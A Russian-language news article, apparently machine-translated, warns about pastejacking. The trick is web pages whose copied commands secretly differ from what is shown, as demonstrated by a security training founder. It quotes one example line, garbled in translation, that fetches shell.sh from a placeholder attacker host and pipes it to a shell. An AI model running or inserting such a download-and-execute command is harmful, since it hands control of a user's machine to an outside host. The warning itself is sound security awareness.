- Мы все ежедневно копируем и вставляем данные из Интернета, даже не подозревая о рисках.
- Эксперт по безопасности нашел время, чтобы показать всем худший вариант развития событий.
- Вставка команд, полученных из Интернета, в ваш терминал - быстрый способ получить взлом
- Команды, которые вы думали, что вставляете в свой терминал, на самом деле являются вредоносными кодами.
Это правда, что мы живем в эпоху, когда скорость - это все, а получение быстрых результатов - это все, что имеет значение. Однако мало кто на самом деле останавливается на секунду и думает о последствиях.
Ежедневно миллионы программистов, администраторов и исследователей безопасности выполняют простые задачи, такие как копирование и вставка команд с веб-страниц непосредственно в консоли на своих ПК.
Хотя многие даже не задумываются об этом, последствия гораздо серьезнее и опаснее, чем вы могли подумать вначале, особенно если вы храните конфиденциальные или ценные данные.
Известный эксперт по безопасности нашел время, чтобы поделиться что могло случиться на самом деле если вы копируете + вставляете контент с веб-страниц.
Копировать + Вставить - это простой способ получить взлом
Габриэль Фридландер, основатель платформы Wizer по обучению вопросам безопасности, раскрыл схему, которая заставит вас дважды подумать, прежде чем копировать и вставлять команды с веб-страниц.
Копирование и вставка контента из Интернета в наши дни стало настолько распространенным явлением, что никто даже не задумывается об этом.
Тем не менее, Фридлендер предупреждает, что некоторые веб-страницы более обманчивы, чем может показаться на первый взгляд, и то, что, по вашему мнению, вы скопировали, сильно отличается от того, что вы сделали на самом деле.
И хуже всего то, что без необходимых знаний или указаний жертвы осознают свою ошибку только после вставки текста, и в этот момент может быть уже слишком поздно.
Аналитик по безопасности также разработал небольшой тест для читателей своего блога, чтобы люди действительно могли понять, насколько легко вы неохотно открываете дверь для киберпреступников.
Он предоставил команду, которая должна быть скопирована, но относящаяся к делу истина раскрывается только тогда, когда вы вставляете текст и видите, что вы фактически внесли в свою настройку.
После копирования команды, показанной на скриншоте выше, результат вставки вас шокирует, так как это далеко не то, что вы думали дублировали.
завиток http://attacker-domain: 8000 / shell.sh | шПомимо совершенно другой команды, присутствующей в вашем буфере обмена, символ новой строки (или возврата) в конец означает, что приведенный выше пример будет выполнен, как только он будет вставлен непосредственно в Linux Терминал.
Так что вам лучше быть в курсе того, что происходит на самом деле, и относиться к этому как к серьезной угрозе безопасности. Мы не говорим, что все веб-сайты скрывают вредоносный контент, но стоит принять это во внимание.
Вас когда-нибудь взламывали, вставляя хитрые команды в свой терминал? Поделитесь с нами своим опытом в разделе комментариев ниже.
![5+ лучших программ для обнаружения вторжений [IDS Tools]](/f/97253b0fd53b21b06be0b802ca6d5ab6.jpg?width=300&height=460)